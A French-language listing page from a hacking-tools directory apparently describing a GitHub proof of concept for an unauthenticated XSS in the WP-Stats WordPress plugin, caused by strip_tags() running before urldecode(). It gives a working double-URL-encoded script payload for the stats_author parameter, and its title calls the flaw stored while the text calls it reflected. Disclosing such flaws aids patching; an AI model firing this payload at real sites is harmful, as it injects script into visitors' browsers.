Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-19794 — WP-Stats <= 2.56 - Cross-Site Scripting stocké non authentifié | Kitploit
Outils/GitHubGitHub/testardou/cve-2026-19794
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et Recherche
GitHubtestardou/cve-2026-19794

CVE-2026-19794

WP-Stats <= 2.56 - Cross-Site Scripting stocké non authentifié

Voir le dépôt
il y a 14h 22mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-19794

WP-Stats <= 2.56 - Cross-Site Scripting stocké non authentifié

URL du plugin

https://wordpress.org/plugins/wp-stats/

Description

XSS réfléchi non authentifié dans le paramètre GET stats_author de stats_page(). Le filtre d'assainissement strip_tags() est appliqué avant urldecode(), ce qui permet à un attaquant de le contourner en encodant deux fois la charge utile en URL.

POC

  1. Installer et activer le plugin WP-Stats
  2. Créer une page ou un article avec le shortcode [page_stats]
  3. Accéder à : http://TARGET/PATH_TO_PAGE_OR_POST/?stats_author=%253Cscript%253Ealert(document.domain)%253C%252Fscript%253E
Télécharger l’outil